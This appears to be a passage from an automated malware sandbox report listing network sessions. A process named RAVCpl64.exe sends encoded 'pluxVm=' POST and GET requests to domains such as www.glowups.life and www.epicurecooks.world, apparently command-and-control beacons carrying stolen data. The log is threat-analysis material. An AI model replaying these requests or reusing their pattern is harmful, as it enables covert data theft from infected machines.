                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                68192.168.11.2049827209.74.79.42807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:55:50.410233021 CET2578OUTPOST /dheh/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.glowups.life
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.glowups.life
                                                                                                                                                                                                                                Referer: http://www.glowups.life/dheh/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 33 4c 30 73 44 36 68 2b 32 56 6b 69 50 2f 48 50 45 39 71 43 47 64 4e 50 62 67 79 36 49 44 32 48 68 66 47 6a 30 43 73 34 66 65 51 74 59 38 62 46 75 76 53 31 78 47 65 66 49 68 4f 72 6a 71 68 51 6e 57 46 31 5a 46 53 2f 48 31 51 76 35 2f 6a 64 76 79 79 31 62 46 7a 64 52 39 73 74 56 69 58 64 76 4a 41 42 71 73 46 4c 4d 65 2f 72 38 4d 33 6f 59 50 72 5a 43 69 78 66 6b 6a 52 52 33 76 49 65 6b 54 47 70 47 5a 49 69 52 42 31 4f 41 66 75 55 30 6e 34 39 51 69 6a 6c 71 4c 53 46 71 5a 2f 66 73 57 30 76 33 4c 56 63 43 6e 51 38 64 6b 57 77 46 4f 65 53 50 47 57 2f 63 6e 49 54 33 71 4a 2b 52 48 32 78 75 54 7a 74 4d 44 67 52 4d 2b 55 33 7a 48 5a 79 69 6b 4c 45 52 79 56 43 64 37 73 38 66 50 68 64 72 45 70 5a 61 4a 7a 72 2f 46 4d 57 7a 71 59 7a 35 58 45 69 6f 55 34 61 45 58 4b 77 2b 46 6c 58 4f 7a 63 39 44 46 6a 76 70 45 6d 57 6c 6d 58 47 6d 49 78 36 67 79 59 5a 56 53 31 49 77 67 43 53 79 6d 58 52 6c 56 35 44 36 51 4b 31 75 4b 79 57 51 74 35 6f 32 50 46 35 34 38 63 59 32 4e 32 74 75 6c 44 34 33 57 6b [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: pluxVm=3L0sD6h+2VkiP/HPE9qCGdNPbgy6ID2HhfGj0Cs4feQtY8bFuvS1xGefIhOrjqhQnWF1ZFS/H1Qv5/jdvyy1bFzdR9stViXdvJABqsFLMe/r8M3oYPrZCixfkjRR3vIekTGpGZIiRB1OAfuU0n49QijlqLSFqZ/fsW0v3LVcCnQ8dkWwFOeSPGW/cnIT3qJ+RH2xuTztMDgRM+U3zHZyikLERyVCd7s8fPhdrEpZaJzr/FMWzqYz5XEioU4aEXKw+FlXOzc9DFjvpEmWlmXGmIx6gyYZVS1IwgCSymXRlV5D6QK1uKyWQt5o2PF548cY2N2tulD43Wk7WbvDlu4s76H9DPbsS6aM9Kd8/E3bMDenk+G5RLfadcgUyVh1Gr+FnAvvfC0VYWm5QoePCRWt5T7fw+GXQU4l+SX9Fr0TvBmk0dBpS6TGkdSfT5HLOFpT1sDMj/kc6qpL69Wwp/yu7GnieYUk4Z+O9bSlVcaOByrZDH2JUBh6JaBb31y2G+d7nz1zdC4AiHzmlpBSk9E4CXupdHN25DA45w22S/KmqSxtEHzQxKJ5T3j3jnW0rrrfWrm0LaHSPXz2j38qVHiyI8IDPI/7EJruirK7nM7kHlV/6kdXIMuUbVeDlMr5eRci5fZc60Qa+lNZjn6lTnHCYu0nxDqie3EF977hd/P/LzcHEFa9rPw6kn7ehjxJct/nNSJyBR9HAYbNFSP7rxsvX4p7vcHCGGQi2hDaTYnOnJpgzJrd1VOzOSiVqC6W7lNqS9n83woOSuu1MVD+28CalthIBpxyG5zFz7RNu7Wxdu54TIS3Repc0UjWJCENUd/IaY3z7iAcZeDzpZXL9jaUMCM/g6CZOCVVa8t1piI76dCf3iRazyrebJzcRVtwTB1gD0VFCcWvGuObJmmuVg26NePnE82Mz/MulWww/S5JTRgxT50D27uy3RQmAwNxYGkg+aGQKPlKHIRJuzq8s8JhtIlb2ZKeL3jq90Ahz5aXruhHQ [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:55:50.410320044 CET5271OUTData Raw: 47 56 64 55 34 68 52 70 6b 37 36 35 31 6d 4b 6e 2f 66 34 34 64 53 6c 49 70 71 70 69 56 4c 51 56 48 6f 4b 38 51 78 43 68 2f 43 2f 53 57 61 74 66 36 4e 5a 45 35 6a 37 47 55 31 33 73 6d 34 64 31 6d 2f 2f 72 32 4e 5a 5a 42 56 53 2f 33 73 46 66 54 73
                                                                                                                                                                                                                                Data Ascii: GVdU4hRpk7651mKn/f44dSlIpqpiVLQVHoK8QxCh/C/SWatf6NZE5j7GU13sm4d1m//r2NZZBVS/3sFfTsqGa0g6pOA4c342R3FE8wMcexHOXSaQgjApguYNebeDfm9JpjIUls8hgNja086UNzYZmKm1kx6okcysqsh5QFxkD8GQUCwzKXFzByX5ms0iuXG1GCgpgs7I+QzU2K3zC7BCEETC/H0SuSv3DwbMbShrsEmlyDnQNm1
                                                                                                                                                                                                                                Dec 3, 2024 14:55:50.586595058 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:55:50 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                69192.168.11.2049828209.74.79.4280
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:55:53.110161066 CET419OUTGET /dheh/?pluxVm=6JcMAOZ0kkEuPLPobYSFFslgEkquVWiK5Nqk+SkmZf4Wc9f19ayTyDiVFSf9h78jkWY5XnirO34u2f/fghaoX1igb+ZsamnQxKAe0eVMQ+zxkvaWI9vtOSA=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.glowups.life
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:55:53.283241034 CET548INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:55:53 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                70192.168.11.2049829208.91.197.2780
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:55:58.440012932 CET698OUTPOST /mdkc/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.epicurecooks.world
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.epicurecooks.world
                                                                                                                                                                                                                                Referer: http://www.epicurecooks.world/mdkc/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 2f 55 2b 6e 59 55 61 33 67 61 43 75 50 34 33 33 35 35 42 55 72 6b 66 4d 42 56 2b 69 4c 37 55 33 54 4e 69 4e 56 6b 66 67 57 5a 75 4a 70 39 72 44 5a 4f 35 4b 41 61 6d 76 77 69 36 59 71 52 4c 38 41 6a 6d 71 39 54 30 37 4f 34 46 4e 6e 73 38 69 2b 46 31 66 36 59 69 42 4a 44 56 49 56 55 44 44 35 52 67 35 73 4e 58 37 5a 54 4a 70 78 39 63 50 51 2b 73 55 49 66 65 64 33 53 52 53 2b 30 77 59 41 4a 46 6e 69 7a 66 79 6b 4f 7a 56 57 7a 30 52 6b 76 31 59 6b 65 47 71 68 79 37 46 70 76 30 57 5a 37 56 33 70 7a 46 68 32 67 73 39 38 39 46 30 63 37 55 58 45 74 7a 73 53 2f 77 4c 2b 64 32 36 43 51 3d 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=/U+nYUa3gaCuP43355BUrkfMBV+iL7U3TNiNVkfgWZuJp9rDZO5KAamvwi6YqRL8Ajmq9T07O4FNns8i+F1f6YiBJDVIVUDD5Rg5sNX7ZTJpx9cPQ+sUIfed3SRS+0wYAJFnizfykOzVWz0Rkv1YkeGqhy7Fpv0WZ7V3pzFh2gs989F0c7UXEtzsS/wL+d26CQ==


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                71192.168.11.2049830208.91.197.2780
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:56:01.111413956 CET718OUTPOST /mdkc/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.epicurecooks.world
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.epicurecooks.world
                                                                                                                                                                                                                                Referer: http://www.epicurecooks.world/mdkc/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 2f 55 2b 6e 59 55 61 33 67 61 43 75 4f 5a 48 33 37 59 42 55 6a 6b 66 50 4e 31 2b 69 5a 37 55 7a 54 4e 6d 4e 56 6c 72 77 57 76 2b 4a 70 5a 76 44 61 4c 5a 4b 42 61 6d 76 6f 79 36 64 75 52 4b 52 41 6a 71 69 39 53 49 37 4f 34 52 4e 6e 75 55 69 69 6d 64 63 37 49 69 48 42 6a 56 4b 49 45 44 44 35 52 67 35 73 4e 44 43 5a 58 64 70 78 73 73 50 43 76 73 4c 46 2f 65 63 32 53 52 53 36 30 77 55 41 4a 46 52 69 33 65 56 6b 4e 4c 56 57 78 73 52 6e 36 5a 62 71 65 47 73 76 53 36 32 35 2b 52 7a 56 4f 4a 44 6f 68 68 4d 77 54 6b 47 35 72 49 75 42 4a 67 7a 48 2b 76 65 57 50 4a 6a 38 66 33 68 66 65 4d 39 36 46 39 6d 6d 49 2b 71 61 56 55 55 2f 34 75 6a 45 6d 63 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=/U+nYUa3gaCuOZH37YBUjkfPN1+iZ7UzTNmNVlrwWv+JpZvDaLZKBamvoy6duRKRAjqi9SI7O4RNnuUiimdc7IiHBjVKIEDD5Rg5sNDCZXdpxssPCvsLF/ec2SRS60wUAJFRi3eVkNLVWxsRn6ZbqeGsvS625+RzVOJDohhMwTkG5rIuBJgzH+veWPJj8f3hfeM96F9mmI+qaVUU/4ujEmc=


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                72192.168.11.2049831208.91.197.2780
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:56:03.782567978 CET2440OUTPOST /mdkc/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.epicurecooks.world
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.epicurecooks.world
                                                                                                                                                                                                                                Referer: http://www.epicurecooks.world/mdkc/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 2f 55 2b 6e 59 55 61 33 67 61 43 75 4f 5a 48 33 37 59 42 55 6a 6b 66 50 4e 31 2b 69 5a 37 55 7a 54 4e 6d 4e 56 6c 72 77 57 76 32 4a 75 71 6e 44 61 71 5a 4b 43 61 6d 76 68 53 36 63 75 52 4c 54 41 67 61 6d 39 53 45 72 4f 37 70 4e 6f 74 73 69 79 54 68 63 77 49 69 48 4e 44 56 48 56 55 43 5a 35 52 77 39 73 4e 54 43 5a 58 64 70 78 76 30 50 53 4f 73 4c 44 2f 65 64 33 53 52 65 2b 30 78 42 41 4e 52 42 69 33 4b 76 6c 38 72 56 58 52 38 52 72 73 4e 62 69 65 47 75 6f 53 36 75 35 2b 74 67 56 50 68 6c 6f 67 6c 6d 77 51 55 47 34 74 31 6e 51 4e 73 51 64 49 58 65 57 63 46 61 36 76 2f 6d 59 4d 78 46 71 6c 45 4c 69 34 33 35 46 58 55 30 37 4b 36 72 66 47 37 6f 54 37 78 47 51 55 47 49 76 71 78 4e 4c 46 76 4f 43 4f 37 6b 53 32 63 6e 75 4f 4a 66 4e 58 72 6a 75 47 74 43 77 30 6c 43 6a 47 72 4f 7a 6c 4a 2f 42 72 47 48 6e 4a 6c 53 32 31 66 44 44 33 35 45 74 37 62 41 6e 71 35 69 69 57 54 49 71 4f 36 61 49 78 42 52 39 50 6f 62 6f 6c 32 34 59 68 2f 63 68 65 2f 71 36 35 57 63 62 4d 74 56 68 75 4c 44 38 62 58 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: pluxVm=/U+nYUa3gaCuOZH37YBUjkfPN1+iZ7UzTNmNVlrwWv2JuqnDaqZKCamvhS6cuRLTAgam9SErO7pNotsiyThcwIiHNDVHVUCZ5Rw9sNTCZXdpxv0PSOsLD/ed3SRe+0xBANRBi3Kvl8rVXR8RrsNbieGuoS6u5+tgVPhloglmwQUG4t1nQNsQdIXeWcFa6v/mYMxFqlELi435FXU07K6rfG7oT7xGQUGIvqxNLFvOCO7kS2cnuOJfNXrjuGtCw0lCjGrOzlJ/BrGHnJlS21fDD35Et7bAnq5iiWTIqO6aIxBR9Pobol24Yh/che/q65WcbMtVhuLD8bXg25KQJXxtnPUNf8pbp5CfqkGMV19Wx2DhbafigfPi8AtD+llVsEDAazN8lFXxaU0P8MQ/fOXIYZ1Y9KFdvl2B4csLuBdNXnVUajmDPXg7w52QwYGDtciwCqeBOiG3cUya1ebEqKTnAnR8H7rUMfFTf010AuovWMipkb+KcxnsIshj5V1a1auMoG7Awx7Sdo7a2mV36l2H89SKsh/M7hvVHwug3JUYXDiSBote3m5WElRHJM/gUUPNevWD7jd6PpzqGKSeQwFZBbCK1PvJkpOijXAaAYmQVkTRKVuyPmtOqP1c/r86cFaoMIzPSQNlY52hN2R9UF746ow/9cGHB7gszD7RVlAV9xsUtQrERKOIotMvQAHeYmsp6qLK83bCXnwgJQbpHbehpaGhZ7l04/QQsegaX/1+aDIexqdQ6ZKCWxpgTuC1iEaWXAjQxNbQsIrlj6OFYewCJ8Jf/nzRzmetg/JohXeZ5fh31DrbW0mH+GPhyCwifrETZQv6Ab8Y7PIidOfAmBeM40ulJ8NggIGf9q/B9ubK5j4H+PWtkCwtWBH2/jpBROyC3xgCNBvhjVPFLHkpsIHyyymJIoMR4B9C2JBc0uzHYCz37IZXdg0e60CG6fZuMBKGm/6wYDLLLrcIOG36c2B13oCeT6Y/uvzgsjjbOP+WVji0r [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:56:03.782618046 CET5427OUTData Raw: 31 62 6b 74 33 69 78 6d 48 4b 71 56 31 64 4f 39 79 67 30 30 52 50 55 58 48 5a 57 77 41 77 46 67 2f 65 64 33 37 31 66 6b 6d 37 71 30 49 47 39 31 31 53 39 63 5a 58 36 72 54 4b 4b 32 5a 62 51 73 78 58 50 33 62 37 61 36 77 6b 34 6b 5a 45 2f 78 6d 67
                                                                                                                                                                                                                                Data Ascii: 1bkt3ixmHKqV1dO9yg00RPUXHZWwAwFg/ed371fkm7q0IG911S9cZX6rTKK2ZbQsxXP3b7a6wk4kZE/xmgXxYGLj6vYTo0KLDk/nWWWak5UnMEjzStjeLJfxODAKWVQgtsATeT9Bcdr+ezrDLEPmY/VP1zPqBBqElEZZxOknlLQR/qR8P+5XvHphG+c6S8Eseeg2JIyiKOOYv54xKlHe0/m+03moEcETbRWuIp2jZHle7VDTV38


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                73192.168.11.2049832208.91.197.2780
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:56:06.454502106 CET425OUTGET /mdkc/?pluxVm=yWWHbhCahbG3DdaBnt9NrGvMUCSQc4g2Tqe6SUjOSsODgr6CFa5SJdyjtzT5mznodS2lvT8/GpN3gvUqymh3/8TyFQ0rIiTFrx443/jhZTAx0fULTMMcMck=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.epicurecooks.world
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112541914 CET999INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:06 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                                                Set-Cookie: vsid=901vr480779766631084573; expires=Sun, 02-Dec-2029 13:56:06 GMT; Max-Age=157680000; path=/; domain=www.epicurecooks.world; HttpOnly
                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Qc4AuhigFg8r2P44Ahsh8bwNmEM1XOJ/2JxY7rqUyl9lnNqfVsEL9tG1PBe14SfEyJewSt5/6EqiUIq8XQ0z/A==
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112596035 CET184INData Raw: 39 66 38 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c
                                                                                                                                                                                                                                Data Ascii: 9f8e<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112642050 CET1220INData Raw: 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72
                                                                                                                                                                                                                                Data Ascii: rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112684011 CET1220INData Raw: 28 77 69 6e 64 6f 77 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 5b 62 5d 2e 6c 29 7d 7d 7d 72 65 74 75 72 6e 20 61 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 65 74 6c 61 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 6a 29 7b 69 66 28 74 79
                                                                                                                                                                                                                                Data Ascii: (window.cmp_customlanguages[b].l)}}}return a};window.cmp_getlang=function(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLang
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112725973 CET1220INData Raw: 3b 76 61 72 20 62 3d 22 5f 65 6e 22 3b 69 66 28 22 63 6d 70 5f 67 65 74 6c 61 6e 67 22 20 69 6e 20 68 29 7b 6f 3d 68 2e 63 6d 70 5f 67 65 74 6c 61 6e 67 28 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 69 66 28 22 63 6d 70 5f 63 75 73 74 6f 6d
                                                                                                                                                                                                                                Data Ascii: ;var b="_en";if("cmp_getlang" in h){o=h.cmp_getlang().toLowerCase();if("cmp_customlanguages" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(
